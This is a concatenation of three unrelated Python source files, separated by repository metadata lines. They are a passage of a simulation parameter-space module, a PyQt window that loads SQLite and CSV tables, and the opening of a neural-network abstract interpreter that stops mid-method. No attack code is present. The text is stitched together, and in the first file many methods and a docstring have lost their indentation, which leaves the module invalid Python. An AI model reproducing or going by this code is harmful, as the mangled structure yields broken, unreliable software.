    :param template_file: path of the (binary) template to read
    :param field_dictionary: mapping of placeholder -> replacement text
    :param save_to: optional path to write the rendered lines to
    :return: list of rendered lines (bytes)
    """
    with open(template_file, 'rb') as handle:
        template_lines = handle.readlines()
    rendered = []
    for raw_line in template_lines:
        updated = raw_line
        for field, replacement in field_dictionary.items():
            updated = updated.replace(field.encode('utf-8'), replacement.encode('utf-8'))
        rendered.append(updated)
    if save_to:
        with open(save_to, 'wb') as out_handle:
            out_handle.writelines(rendered)
    return rendered
def replace_experiment_labels(file, system_label=None, project_label=None):
    """Rewrite top-level `system_label` / `project_label` assignments in `file`.

    Only lines that *start* with the variable name are replaced; the file is
    rewritten in place.
    """
    with open(file, 'rb') as handle:
        lines = handle.readlines()
    for position, line in enumerate(lines):
        if system_label is not None and line.startswith(b"system_label"):
            lines[position] = "system_label = '{}'\n".format(system_label).encode()
        if project_label is not None and line.startswith(b"project_label"):
            lines[position] = "project_label = '{}'\n".format(project_label).encode()
    with open(file, 'wb') as handle:
        handle.writelines(lines)
# ########################################################################################
class ParameterSpace:
"""
A collection of `ParameterSets`, representing multiple points (combinations) in parameter space.
Parses parameter scripts and runs experiments locally or creates job files to be run on a cluster.
Can also harvest stored results from previous experiments and recreate the parameter space for post-profiler.
"""
    def __init__(self, initializer, system_label=None, project_label=None, keep_all=False):
        """
        Generate ParameterSpace containing a list of all ParameterSets
        :param initializer: file url
        :param keep_all: store all original parameters (??)
        :return: (tuple) param_sets, param_axes, global_label, size of parameter space
        """
        assert isinstance(initializer, str), "Filename must be provided"
        # Optionally patch the experiment labels in the parameter file first.
        if system_label is not None or project_label is not None:
            replace_experiment_labels(initializer, system_label, project_label)
        # Keep the raw file contents so save() can re-write it verbatim.
        with open(initializer, 'rb') as fp:
            self.parameter_file = fp.readlines()
        def validate_parameters_file(module):
            """
            Checks for any errors / incompatibilities in the structure of the parameter file. Function
            `build_parameters` is required, with or without arguments.
            :param module: imported parameter module object
            :return:
            """
            # TODO anything else?
            # build_parameters function must be defined!
            if not hasattr(module, "build_parameters"):
                raise ValueError("`build_parameters` function is missing!")
            # check parameter range and function arguments
            range_arguments = inspect.getfullargspec(module.build_parameters)[0]
            # logs.info(range_arguments)
            if not hasattr(module, "ParameterRange"):
                if len(range_arguments) == 0:
                    return
                raise ValueError("`ParameterRange` and arguments of `build_parameters` do not match!")
            for arg in range_arguments:
                if arg not in module.ParameterRange:
                    raise ValueError('ParameterRange variable `%s` is not in `ParameterRange` dictionary!' % arg)
                if not isiterable(module.ParameterRange[arg]):
                    raise ValueError('ParameterRange variable `%s` is not iterable! Should be list!' % arg)
        def validate_parameter_sets(param_sets):
            """
            Verify every parameter set carries the required dictionaries.
            :param param_sets:
            :return:
            """
            required_dicts = ["kernel_pars"]#, "encoding_pars", "net_pars"]
            for p_set in param_sets:
                for d in required_dicts:
                    if d not in p_set:
                        raise ValueError("Required parameter (dictionary) `%s` not found!" % d)
                # `data_prefix` required
                if "data_prefix" not in p_set["kernel_pars"]:
                    raise ValueError("`data_prefix` missing from `kernel_pars`!")
        def parse_parameters_file(url):
            """
            Import a .py parameter script and expand its ParameterRange into
            one ParameterSet per range combination.
            :param url:
            :return:
            """
            module_name, module_obj = import_mod_file(url)
            # print(sys.path)
            sys.path.pop(-1)
            del sys.modules[module_name]
            try:
                validate_parameters_file(module_obj)
            except ValueError as error:
                # NOTE(review): exit(-1) aborts the whole interpreter on an
                # invalid file — consider re-raising instead.
                logs.info("Invalid parameter file! Error: %s" % error)
                exit(-1)
            range_args = inspect.getfullargspec(module_obj.build_parameters)[0] # arg names in build_parameters function
            n_ranges = len(range_args)
            n_runs = int(np.prod([len(module_obj.ParameterRange[arg]) for arg in range_args])) # nr combinations
            param_axes = dict()
            param_sets = []
            # build cross product of parameter ranges, sorting corresponds to argument ordering in build_parameters
            # empty if no range parameters are present: [()]
            range_combinations = list(itertools.product(*[module_obj.ParameterRange[arg] for arg in range_args]))
            # call build_parameters for each range combination, and pack returned values into a list (set)
            # contains a single dictionary if no range parameters
            param_ranges = [module_obj.build_parameters(*elem) for elem in range_combinations]
            global_label = param_ranges[0]['kernel_pars']['data_prefix']
            if n_ranges <= 3:
                # verify parameter integrity / completeness
                try:
                    validate_parameter_sets(param_ranges)
                except ValueError as error:
                    logs.info("Invalid parameter file! Error: %s" % error)
                # build parameter axes
                # up to 3 dimensions get conventional x/y/z axis names
                axe_prefixes = ['x', 'y', 'z']
                for range_index in range(n_runs):
                    params_label = global_label
                    for axe_index, axe in enumerate(axe_prefixes[:n_ranges]): # limit axes to n_ranges
                        param_axes[axe + 'label'] = range_args[axe_index]
                        param_axes[axe + 'ticks'] = module_obj.ParameterRange[param_axes[axe + 'label']]
                        param_axes[axe + 'ticklabels'] = [str(xx) for xx in param_axes[axe + 'ticks']]
                        params_label += '_' + range_args[axe_index]
                        params_label += '=' + str(range_combinations[range_index][axe_index])
                    p_set = ParameterSet(param_ranges[range_index], label=params_label)
                    if not keep_all:
                        p_set = p_set.clean(termination='pars')
                        p_set.update({'label': params_label})
                    param_sets.append(p_set)
            else:
                # verify parameter integrity / completeness
                try:
                    validate_parameter_sets(param_ranges)
                except ValueError as error:
                    logs.info("Invalid parameter file! Error: %s" % error)
                # build parameter axes
                # NOTE(review): this branch duplicates the one above except
                # for the axis prefixes (a, b, c, ...) — candidate for a merge.
                axe_prefixes = [a for a in string.ascii_letters][:n_ranges]
                for range_index in range(n_runs):
                    params_label = global_label
                    for axe_index, axe in enumerate(axe_prefixes[:n_ranges]): # limit axes to n_ranges
                        param_axes[axe + 'label'] = range_args[axe_index]
                        param_axes[axe + 'ticks'] = module_obj.ParameterRange[param_axes[axe + 'label']]
                        param_axes[axe + 'ticklabels'] = [str(xx) for xx in param_axes[axe + 'ticks']]
                        params_label += '_' + range_args[axe_index]
                        params_label += '=' + str(range_combinations[range_index][axe_index])
                    p_set = ParameterSet(param_ranges[range_index], label=params_label)
                    if not keep_all:
                        p_set = p_set.clean(termination='pars')
                        p_set.update({'label': params_label})
                    param_sets.append(p_set)
            return param_sets, param_axes, global_label, n_ranges, module_obj.ParameterRange
        def parse_parameters_dict(url):
            """
            Simple parser for dictionary (text) parameter scripts, not .py!
            :param url:
            :return:
            """
            param_set = ParameterSet(url)
            try:
                validate_parameter_sets([param_set])
            except ValueError as error:
                logs.info("Invalid parameter file! Error: %s" % error)
            param_axes = {}
            label = param_set.kernel_pars["data_prefix"]
            dim = 1
            return [param_set], param_axes, label, dim, {}
        # .py scripts go through the range-expanding parser; anything else is
        # treated as a plain ParameterSet dictionary.
        if initializer.endswith(".py"):
            self.parameter_sets, self.parameter_axes, self.label, self.dimensions, self.parameter_ranges = \
                parse_parameters_file(initializer)
        else:
            self.parameter_sets, self.parameter_axes, self.label, self.dimensions, self.parameter_ranges = \
                parse_parameters_dict(initializer)
def update_run_parameters(self, system_label=None, project_label=None): #, system_params=None):
"""
Update run type and experiments specific paths in case a system_label template is specified.
:param project_label:
:param system_label: name of system_label template, e.g., Blaustein
:return:
"""
paths = set_project_paths(system=system_label, project_label=project_label)
# if system_params is None:
# system_params = set_system_parameters(cluster=system_label)
# kernel_pars = set_kernel_defaults(resolution=0.1, run_type=system_label, data_label='',
# data_paths=paths, **system_params)
if system_label is not None and system_label != "local":
assert system_label in paths.keys(), "Default setting for cluster {0} not found!".format(system_label)
for param_set in self.parameter_sets:
param_set.kernel_pars['data_path'] = paths[system_label]['data_path']
param_set.kernel_pars['mpl_path'] = paths[system_label]['matplotlib_rc']
param_set.kernel_pars['print_time'] = False
param_set.kernel_pars.system.local = False
param_set.kernel_pars.system.system_label = system_label
param_set.kernel_pars.system.jdf_template = paths[system_label]['jdf_template']
param_set.kernel_pars.system.remote_directory = paths[system_label]['remote_directory']
param_set.kernel_pars.system.queueing_system = paths[system_label]['queueing_system']
# param_set.kernel_pars.system.jdf_fields = kernel_pars.system.jdf_fields
else:
for param_set in self.parameter_sets:
param_set.kernel_pars['data_path'] = paths[system_label]['data_path']
param_set.kernel_pars['mpl_path'] = paths[system_label]['matplotlib_rc']
param_set.kernel_pars['print_time'] = True
param_set.kernel_pars.system.local = True
param_set.kernel_pars.system.system_label = system_label
param_set.kernel_pars.system.jdf_template = paths[system_label]['jdf_template']
param_set.kernel_pars.system.remote_directory = paths[system_label]['remote_directory']
param_set.kernel_pars.system.queueing_system = paths[system_label]['queueing_system']
def iter_sets(self):
"""
An iterator which yields the ParameterSets in ParameterSpace
"""
for val in self.parameter_sets:
yield val
def __eq__(self, other):
"""
For testing purposes
:param other:
:return:
"""
if not isinstance(other, self.__class__):
return False
for key in self.parameter_axes:
if key not in other.parameter_axes:
return False
else:
if isinstance(self.parameter_axes[key], np.ndarray):
if not np.array_equal(self.parameter_axes[key], other.parameter_axes[key]):
return False
elif self.parameter_axes[key] != other.parameter_axes[key]:
return False
if self.label != other.label or self.dimensions != other.dimensions:
return False
return self.parameter_sets == other.parameter_sets
    def __getitem__(self, item):
        # delegate indexing/slicing straight to the underlying list of ParameterSets
        return self.parameter_sets[item]
    def __len__(self):
        # number of ParameterSets spanned by this space
        return len(self.parameter_sets)
    def save(self, target_full_path):
        """
        Save the full ParameterSpace by re-writing the parameter file
        :param target_full_path: destination path for the copied parameter file
        :return: None
        """
        # NOTE(review): opened in binary mode, so self.parameter_file is assumed
        # to hold bytes lines — confirm how it is populated upstream
        with open(target_full_path, 'wb') as fp:
            fp.writelines(self.parameter_file)
def compare_sets(self, parameter):
"""
Determine whether a given parameter is common to all parameter sets
:param parameter: parameter to compare
"""
common = dict(pair for pair in self.parameter_sets[0].items() if all((pair in d.items() for d in
self.parameter_sets[1:])))
result = False
if parameter in common.keys():
result = True
else:
for k, v in common.items():
if isinstance(v, dict):
if parameter in v.keys():
result = True
return result
    def run(self, computation_function, project_dir=None, **parameters):
        """
        Run a computation on all the parameters
        :param computation_function: function to execute
        :param project_dir: project root, used to build the remote job scripts
        :param parameters: kwarg arguments for the function
        :return: result of the LAST parameter set when run locally, else None
        """
        # the system settings of the first set decide local vs. cluster execution
        system = self.parameter_sets[0].kernel_pars.system
        if system['local']:
            logs.info("Running {0} serially on {1} Parameter Sets".format(
                str(computation_function.__module__.split('.')[1]), str(len(self))))
            results = None
            for par_set in self.parameter_sets:
                logs.info("\n- Parameters: {0}".format(str(par_set.label)))
                # NOTE: `results` is overwritten each iteration — only the last
                # parameter set's result is returned
                results = computation_function(par_set, **parameters)
            return results
        else:
            # remote execution: write one .py + .sh job per parameter set plus a job list
            logs.info("Preparing job description files...")
            export_folder = system['remote_directory']
            main_experiment_folder = export_folder + '{0}/'.format(self.label)
            try:
                os.makedirs(main_experiment_folder)
            except OSError as err:
                # tolerate an already-existing experiment folder, fail otherwise
                if err.errno == errno.EEXIST and os.path.isdir(main_experiment_folder):
                    logs.info("Path `{0}` already exists, will be overwritten!".format(main_experiment_folder))
                else:
                    raise OSError(err.errno, "Could not create exported experiments folder.", main_experiment_folder)
            remote_run_folder = export_folder + self.label + '/'
            project_dir = os.path.abspath(project_dir)
            network_dir = os.path.abspath(project_dir + '/../')
            # common preamble written at the top of every generated job script
            py_file_common_header = ("import sys\nsys.path.append('{0}')\nsys.path.append('{1}')\nimport matplotlib"
                                     "\nmatplotlib.use('Agg')\nfrom fna.tools.parameters import *\nfrom "
                                     "fna.tools.analysis import *\nfrom experiments import {2}\n\n") \
                .format(project_dir, network_dir, computation_function.__module__.split('.')[1])
            write_to_submit = []
            job_list = main_experiment_folder + 'job_list.txt'
            for par_set in self.parameter_sets:
                system2 = par_set.kernel_pars.system
                template_file = system2['jdf_template']
                queueing_system = system2['queueing_system']
                exec_file_name = remote_run_folder + par_set.label + '.sh'
                local_exec_file = main_experiment_folder + par_set.label + '.sh'
                computation_file = main_experiment_folder + par_set.label + '.py'
                remote_computation_file = remote_run_folder + par_set.label + '.py'
                par_set.save(main_experiment_folder + par_set.label + '.txt')
                with open(computation_file, 'w') as fp:
                    fp.write(py_file_common_header)
                    fp.write(computation_function.__module__.split('.')[1] + '.' + computation_function.__name__ +
                             "({0}, **{1})".format("'./" + par_set.label + ".txt'", str(parameters)))
                system2['jdf_fields'].update({'{{ computation_script }}': remote_computation_file,
                                              '{{ script_folder }}': remote_run_folder})
                # print(system2)
                parse_template(template_file, system2['jdf_fields'].as_dict(), save_to=local_exec_file)
                write_to_submit.append("{0}\n".format(exec_file_name))
            with open(job_list, 'w') as fp:
                fp.writelines(write_to_submit)
def print_stored_keys(self, data_path):
"""
Print all the nested keys in the results dictionaries for the current data set
:param data_path: location of "Results" folder
:return:
"""
def pretty(d, indent=1):
if isinstance(d, dict):
indent += 1
for key, value in d.items():
print('-' * indent + ' ' + str(key))
if isinstance(value, dict):
pretty(value, indent + 1)
pars_labels = [n.label for n in self]
# open example data
ctr = 0
found_ = False
while ctr < len(pars_labels) and not found_:
try:
with open(data_path + pars_labels[ctr], 'rb') as fp:
results = pickle.load(fp)
print("Loading ParameterSet {0}".format(self.label))
found_ = True
except:
print("Dataset {0} Not Found, skipping".format(pars_labels[ctr]))
ctr += 1
continue
print("\n\nResults dictionary structure:\n- Root")
pretty(results)
def get_stored_keys(self, data_path):
"""
Get a nested list of dictionary keys in the results dictionaries
:return:
"""
def extract_keys(d):
for k, v in d.items():
if isinstance(v, dict):
for x in extract_keys(v):
yield "{}/{}".format(k, x)
else:
yield k
pars_labels = [n.label for n in self]
# open example data
ctr = 0
found_ = False
while ctr < len(pars_labels) and not found_:
try:
with open(data_path + pars_labels[ctr], 'rb') as fp:
results = pickle.load(fp)
print("Loading ParameterSet {0}".format(self.label))
found_ = True
except:
print("Dataset {0} Not Found, skipping".format(pars_labels[ctr]))
ctr += 1
continue
return [k for k in extract_keys(results)]
    def harvest(self, data_path, key_set=None, operation=None, verbose=True):
        """
        Gather stored results data and populate the space spanned by the Parameters with the corresponding results
        :param data_path: full path to global data folder
        :param key_set: specific result to extract from each results dictionary (nested keys should be specified as
        'key1/key2/...'
        :param operation: function to apply to result, if any
        :param verbose: print progress/skip messages while loading
        :return: (parameter_labels, results_array)
        """
        if self.parameter_axes:# and self.dimensions <= 3:
            # pars_path = data_path[:-8]+"ParameterSpace.py"
            # module_name, module_obj = import_mod_file(pars_path)
            # sys.path.pop(-1)
            # del sys.modules[module_name]
            # range_args = inspect.getfullargspec(module_obj.build_parameters)[0]
            # range_combinations = list(itertools.product(*[module_obj.ParameterRange[arg] for arg in range_args]))
            # axis prefixes: x/y/z for up to 3 dims, otherwise generic letters
            if self.dimensions <= 3:
                l = ['x', 'y', 'z']
            else:
                l = [a for a in string.ascii_letters][:self.dimensions]
            domain_lens = [len(self.parameter_axes[l[idx] + 'ticks']) for idx in range(self.dimensions)]
            domain_values = [self.parameter_axes[l[idx] + 'ticks'] for idx in range(self.dimensions)]
            var_names = [self.parameter_axes[l[idx] + 'label'] for idx in range(self.dimensions)]
            dom_len = np.prod(domain_lens)
            results_array = np.empty(tuple(domain_lens), dtype=object)
            parameters_array = np.empty(tuple(domain_lens), dtype=object)
            assert len(self) == dom_len, "Domain length inconsistent"
            pars_labels = [n.label for n in self]
            for n in tqdm(range(int(dom_len)), desc="Loading datasets", total=int(dom_len)):
                # rebuild the dataset label '<label>_<var>=<value>_...' from the
                # flat index n (mixed-radix decoding, one digit per dimension)
                params_label = self.label
                index = []
                # for axe_index, axe in enumerate(l[:self.dimensions]):
                #     params_label += '_' + range_args[axe_index]
                #     params_label += '=' + str(range_combinations[range_index][axe_index])
                if self.dimensions >= 1:
                    idx_x = n % domain_lens[0]
                    params_label += '_' + var_names[0] + '=' + str(domain_values[0][idx_x])
                    index.append(idx_x)
                if self.dimensions >= 2:
                    idx_y = (n // domain_lens[0]) % domain_lens[1]
                    params_label += '_' + var_names[1] + '=' + str(domain_values[1][idx_y])
                    index.append(idx_y)
                if self.dimensions >= 3:
                    idx_z = ((n // domain_lens[0]) // domain_lens[1]) % domain_lens[2]
                    params_label += '_' + var_names[2] + '=' + str(domain_values[2][idx_z])
                    index.append(idx_z)
                if self.dimensions >= 4:
                    idx_a = ((n // domain_lens[0]) // domain_lens[1] // domain_lens[2]) % domain_lens[3]
                    params_label += '_' + var_names[3] + '=' + str(domain_values[3][idx_a])
                    index.append(idx_a)
                if self.dimensions >= 5:
                    idx_b = ((n // domain_lens[0]) // domain_lens[1] // domain_lens[2] // domain_lens[3]) % domain_lens[4]
                    params_label += '_' + var_names[4] + '=' + str(domain_values[4][idx_b])
                    index.append(idx_b)
                if self.dimensions >= 6:
                    idx_c = ((n // domain_lens[0]) // domain_lens[1] // domain_lens[2] // domain_lens[3] // domain_lens[4]) % domain_lens[5]
                    params_label += '_' + var_names[5] + '=' + str(domain_values[5][idx_c])
                    index.append(idx_c)
                if self.dimensions > 6:
                    raise NotImplementedError("Harvesting ParameterSpaces of more than 6 dimensions is not implemented yet")
                parameters_array[tuple(index)] = pars_labels[pars_labels.index(params_label)]
                try:
                    with open(data_path + params_label, 'rb') as fp:
                        results = pickle.load(fp)
                    if verbose:
                        print("Loading {0}".format(params_label))
                except:
                    # NOTE(review): bare except also swallows KeyboardInterrupt;
                    # prefer `except Exception` here
                    if verbose:
                        print("Dataset {0} Not Found, skipping".format(params_label))
                    continue
                if key_set is not None:
                    try:
                        nested_result = NestedDict(results)
                        if operation is not None:
                            results_array[tuple(index)] = operation(nested_result[key_set])
                        else:
                            results_array[tuple(index)] = nested_result[key_set]
                    except:
                        # missing key in this dataset: leave the cell empty
                        continue
                else:
                    results_array[tuple(index)] = results
        else:
            # no axes: a single dataset named after the space label
            parameters_array = self.label
            results_array = []
            try:
                with open(data_path + self.label, 'rb') as fp:
                    results = pickle.load(fp)
                if verbose:
                    print("Loading Dataset {0}".format(self.label))
                if key_set is not None:
                    nested_result = NestedDict(results)
                    assert isinstance(results, dict), "Results must be dictionary"
                    if operation is not None:
                        results_array = operation(nested_result[key_set])
                    else:
                        results_array = nested_result[key_set]
                else:
                    results_array = results
            except IOError:
                if verbose:
                    print("Dataset {0} Not Found, skipping".format(self.label))
        return parameters_array, results_array
class NestedDict(MutableMapping):
    """
    Mapping that transparently resolves keys at any nesting depth.

    Keys may be plain keys, 'a/b/c' slash-paths, or lists/tuples of keys;
    lookups that miss at the top level recurse into nested dict values.
    """
    def __init__(self, initial_value=None, root=True):
        super(self.__class__, self).__init__()
        self._val = {}
        if initial_value is not None:
            self._val.update(initial_value)
        # _found tracks whether a recursive lookup/update succeeded anywhere
        self._found = False
        # _root marks the outermost instance: only the root raises KeyError
        self._root = root
    def __getitem__(self, item):
        self._found = False
        def _look_deeper():
            # search every nested dict value for `item`; collect all matches
            result = tuple()
            for k, v in list(self._val.items()):
                if isinstance(v, dict):
                    n = NestedDict(self[k], root=False)
                    if n[item]:
                        result += (n[item],)
                    self._found = self._found or n._found
            if self._root:
                if self._found:
                    self._found = False
                else:
                    raise KeyError(item)
            # unwrap a single match; multiple matches come back as a tuple
            result = result[0] if len(result) == 1 else result
            return result
        def _process_list():
            # resolve a path given as a list/tuple of keys, one level at a time
            if len(item) == 1:
                return self[item[0]]
            trunk, branches = item[0], item[1:]
            nd = NestedDict(self[trunk], root=False)
            return nd[branches] if len(branches) > 1 else nd[branches[0]]
        if isinstance(item, list):
            return _process_list()
        elif self.__isstring_containing_char(item, '/'):
            item = item.split('/')
            return _process_list()
        elif item in self._val:
            self._found = True
            return self._val.__getitem__(item)
        else:
            return _look_deeper()
    def __setitem__(self, branch_key, value):
        self._found = False
        def _process_list():
            # NOTE(review): `tip` is the FIRST element here (unlike __getitem__);
            # confirm this ordering is intentional
            branches, tip = branch_key[1:], branch_key[0]
            if self[tip]:
                if isinstance(self[tip], tuple):
                    if isinstance(self[branches], tuple):
                        raise KeyError('ambiguous keys={!r}'.format(branch_key))
                    else:
                        self[branches][tip] = value
                else:
                    self[tip] = value
            else:
                raise KeyError('no key found={!r}'.format(tip))
        def _look_deeper():
            # try to set the key inside any nested dict; only the root falls
            # back to a plain top-level insertion when nothing matched
            nd = NestedDict(root=False)
            for k, v in list(self._val.items()):
                if v and (isinstance(v, dict) or isinstance(v, NestedDict)):
                    nd._val = self._val[k]
                    nd[branch_key] = value
                    self._found = self._found or nd._found
            if self._root:
                if self._found:
                    self._found = False
                else:
                    self._val.__setitem__(branch_key, value)
        if isinstance(branch_key, list) or isinstance(branch_key, tuple):
            _process_list()
        elif self.__isstring_containing_char(branch_key, '/'):
            branch_key = branch_key.split('/')
            _process_list()
        elif branch_key in self._val:
            self._found = True
            self._val.__setitem__(branch_key, value)
        else:
            _look_deeper()
    def __delitem__(self, key):
        # deletion is top-level only (no recursive search)
        self._val.__delitem__(key)
    def __iter__(self):
        return self._val.__iter__()
    def __len__(self):
        return self._val.__len__()
    def __repr__(self):
        return __name__ + str(self._val)
    def __call__(self):
        # expose the raw underlying dict
        return self._val
    def __contains__(self, item):
        # NOTE: top-level membership only, unlike __getitem__ which recurses
        return self._val.__contains__(item)
    def anchor(self, trunk, branch, value=None):
        """Attach `branch: value` under the (possibly nested) key `trunk`."""
        nd = NestedDict(root=False)
        for k, v in list(self._val.items()):
            if v and isinstance(v, dict):
                nd._val = self._val[k]
                nd.anchor(trunk, branch, value)
                self._found = self._found or nd._found
            if k == trunk:
                self._found = True
                if not isinstance(self._val[trunk], dict):
                    if self._val[trunk]:
                        raise ValueError('value of this key is not a logical False')
                    else:
                        self._val[trunk] = {}  # replace None, [], 0 and False to {}
                self._val[trunk][branch] = value
        if self._root:
            if self._found:
                self._found = False
            else:
                raise KeyError
    def setdefault(self, key, default=None):
        """Like dict.setdefault, but a list/tuple key creates a nested path."""
        if isinstance(key, list) or isinstance(key, tuple):
            trunk, branches = key[0], key[1:]
            self._val.setdefault(trunk, {})
            if self._val[trunk]:
                pass
            else:
                self._val[trunk] = default
            nd = NestedDict(self[trunk], root=False)
            if len(branches) > 1:
                nd[branches] = default
            elif len(branches) == 1:
                nd._val[branches[0]] = default
            else:
                raise KeyError
        else:
            self._val.setdefault(key, default)
    @staticmethod
    def __isstring_containing_char(obj, char):
        # True only for str objects that contain `char`
        if isinstance(obj, str):
            if char in obj:
                return True
        return False
| zbarni/re_modular_seqlearn | src/utils/parameters.py | parameters.py | py | 31,563 | python | en | code | 1 | github-code | 50 |
35933395089 | import sys
from PyQt5.QtWidgets import QApplication, QDialog, QPushButton, QSlider, QVBoxLayout, QWidget, QFileDialog, QLabel, \
QTableWidgetItem
from PyQt5.QtGui import QPixmap, QImage, QColor, qRgb, QTransform
from PyQt5.QtCore import Qt
from PyQt5 import uic, QtCore
from PIL import Image, ImageEnhance, ImageFilter, ImageOps, ImageDraw
import sqlite3
import csv
class SecondForm(QWidget):
    """Secondary window showing a SQLite table and a CSV file in two table widgets."""
    def __init__(self, *args):
        super().__init__()
        self.initUI()
        # connection stays open for the lifetime of the window
        self.con = sqlite3.connect("db.sqlite")
        self.filter_bd()
        self.loadTable('images2.csv')
    def initUI(self):
        # the Russian title means 'Second form'; the widgets referenced below
        # (tabWid_bd, tableWidget_csv) are assumed to be defined in form2.ui —
        # TODO confirm against the .ui file
        self.setWindowTitle('Вторая форма')
        uic.loadUi('form2.ui', self)
    def filter_bd(self):
        """Load every row of the 'filters' table into the tabWid_bd widget."""
        self.cur = self.con.cursor()
        tab1 = "SELECT * FROM filters"
        try:
            result = self.cur.execute(tab1).fetchall()
            self.tabWid_bd.setRowCount(len(result))
            # IndexError on result[0] when the table is empty is caught below
            self.tabWid_bd.setColumnCount(len(result[0]))
            for i, elem in enumerate(result):
                for j, val in enumerate(elem):
                    self.tabWid_bd.setItem(i, j, QTableWidgetItem(str(val)))
        except Exception as e:
            # broad catch keeps the GUI alive if the DB/table is missing;
            # the error is only printed to stdout
            print(e)
    def loadTable(self, table_name):
        """Populate tableWidget_csv from a ';'-delimited CSV file with a header row."""
        try:
            with open(table_name) as csvfile:
                reader = csv.reader(csvfile, delimiter=';', quotechar='"')
                title = next(reader)
                self.tableWidget_csv.setColumnCount(len(title))
                self.tableWidget_csv.setHorizontalHeaderLabels(title)
                self.tableWidget_csv.setRowCount(0)
                for i, row in enumerate(reader):
                    # grow the table one row at a time as lines are read
                    self.tableWidget_csv.setRowCount(
                        self.tableWidget_csv.rowCount() + 1)
                    for j, elem in enumerate(row):
                        self.tableWidget_csv.setItem(i, j, QTableWidgetItem(str(elem)))
                self.tableWidget_csv.resizeColumnsToContents()
        except Exception as e:
            print(e)
if __name__ == "__main__":
    # standard Qt bootstrap: create the application, show the form and hand
    # control to the event loop until the window is closed
    app = QApplication(sys.argv)
    window = SecondForm()
    window.show()
    sys.exit(app.exec_())
| Sofi-s/projectQT | csv_table.py | csv_table.py | py | 2,148 | python | en | code | 0 | github-code | 50 |
24616134687 | from copy import deepcopy
from queue import Queue
from typing import Set, Dict, Tuple, List, FrozenSet
from pulp import pulp, PULP_CBC_CMD
from pip._vendor.colorama import Fore, Style
from agbs.abstract_domains.state import State
from agbs.abstract_domains.symbolic_domain import substitute_in_dict, evaluate_with_constraints
from agbs.core.cfg import Node, Function, Activation
from agbs.core.expressions import VariableIdentifier
from agbs.core.statements import Call
from agbs.semantics.forward import DefaultForwardSemantics
class AGBSInterpreter:
    """
    Abstract interpreter that explores ReLU activation patterns of a neural
    network CFG: a forward analysis in an abstract domain classifies ReLUs as
    active/inactive/uncertain, and LP solving (PuLP/CBC) splits and tightens
    the input region along chosen uncertain ReLUs.
    """
    def __init__(self, cfg, domain, semantics, nodes):
        """
        :param cfg: control-flow graph of the network
        :param domain: abstract domain used by the forward analysis
        :param semantics: forward semantics object
        :param nodes: triple (input variables, {relu name -> node}, output variables)
        """
        self._cfg = cfg
        self._domain = domain
        self._semantics = semantics
        self._inputs = nodes[0]
        self._relus_name2node = nodes[1]
        # inverse mapping: CFG node -> variable identifier
        self._relus_node2name = {n: v for v, n in nodes[1].items()}
        self._outputs = nodes[2]
        self._initial = None
        self._pattern = None
    @property
    def cfg(self):
        return self._cfg
    @property
    def domain(self):
        return self._domain
    @property
    def semantics(self):
        return self._semantics
    @property
    def inputs(self) -> Set[VariableIdentifier]:
        return self._inputs
    @property
    def relus_name2node(self) -> Dict[VariableIdentifier, Node]:
        return self._relus_name2node
    @property
    def relus_node2name(self) -> Dict[Node, VariableIdentifier]:
        return self._relus_node2name
    @property
    def outputs(self) -> Set[VariableIdentifier]:
        return self._outputs
    @property
    def initial(self):
        # deep copy so callers cannot mutate the stored initial state
        return deepcopy(self._initial)
    @property
    def pattern(self) -> List[Tuple[Set[str], Set[str]]]:
        return self._pattern
    def fwd(self, initial, forced_active=None, forced_inactive=None, constraints=None):
        """Single run of the forward analysis with the abstract domain
        :param initial: abstract state to start from
        :param forced_active: ReLU nodes forced active (may be None)
        :param forced_inactive: ReLU nodes forced inactive (may be None)
        :param constraints: extra constraints passed to the affine transfer
        :return: (status, activations, picked) where status is 1 (all outputs
            provably >= 0), -1 (some output provably < 0), None (undecided but
            no uncertain ReLUs remain) or 0 (undecided; `picked` carries the
            chosen uncertain ReLU names and their back-substituted expression)
        """
        worklist = Queue()
        worklist.put(self.cfg.in_node)
        state = deepcopy(initial)
        # one (active, inactive, uncertain) frozenset triple per ReLU layer
        activations = list()
        activated, deactivated, uncertain = set(), set(), set()
        while not worklist.empty():
            current: Node = worklist.get()  # retrieve the current node
            if isinstance(current, Function):
                # a Function node closes the previous ReLU layer, if any
                if activated or deactivated or uncertain:
                    activations.append((frozenset(activated), frozenset(deactivated), frozenset(uncertain)))
                    activated, deactivated, uncertain = set(), set(), set()
                state = state.affine(current.stmts[0], current.stmts[1], constraints=constraints)
            elif isinstance(current, Activation):
                if forced_active and current in forced_active:
                    state = state.relu(current.stmts, active=True)
                    activated.add(current)
                elif forced_inactive and current in forced_inactive:
                    state = state.relu(current.stmts, inactive=True)
                    deactivated.add(current)
                else:
                    state = state.relu(current.stmts)
                    if state.is_bottom():
                        deactivated.add(current)
                    # state.flag: >0 definitely active, <0 definitely inactive
                    if state.flag:
                        if state.flag > 0:
                            activated.add(current)
                        else:
                            deactivated.add(current)
                    if current not in activated and current not in deactivated:
                        uncertain.add(current)
            else:
                if activated or deactivated or uncertain:
                    activations.append((frozenset(activated), frozenset(deactivated), frozenset(uncertain)))
                    activated, deactivated, uncertain = set(), set(), set()
                for stmt in reversed(current.stmts):
                    state = self.semantics.assume_call_semantics(stmt, state)
            # update worklist
            for node in self.cfg.successors(current):
                worklist.put(self.cfg.nodes[node.identifier])
        # state.log(self.outputs)
        # get lower-bounds and upper-bounds for all outputs
        lowers: Dict[str, float] = dict((o.name, state.bounds[o.name].lower) for o in self.outputs)
        uppers: Dict[str, float] = dict((o.name, state.bounds[o.name].upper) for o in self.outputs)
        self.print_pattern(activations)
        if all(lower >= 0 for lower in lowers.values()):
            return 1, activations, None
        elif any(upper < 0 for upper in uppers.values()):
            return -1, activations, None
        else:
            # retrieve uncertain relus
            uncertain: List[Set[str]] = list()
            for pack in activations:
                if pack[2]:
                    uncertain.append({self.relus_node2name[n].name for n in pack[2]})
            if len(uncertain) == 0:
                # for o in self.outputs:
                #     if o.name in state.expressions:
                #         # back-substitution
                #         current = state.expressions[o.name]
                #         while any(variable in state.expressions for variable in state.expressions[o.name].keys()):
                #             for sym, val in state.expressions.items():
                #                 if sym in current:
                #                     current = substitute_in_dict(current, sym, val)
                #         state.expressions[o.name] = current
                #         # evaluate_with_constraints(state.expressions[o.name])
                return None, activations, None
            # pick output with smallest lower-bound
            lowers: Dict[str, float] = dict((o.name, state.bounds[o.name].lower) for o in self.outputs)
            picked: str = min(lowers, key=lowers.get)
            # retrieve its symbolic expression
            expression: Dict[str, float] = state.symbols[picked][1]
            # remove inputs and constants from symbolic expression to only remain with relus
            for i in self.inputs:
                expression.pop(i.name, None)
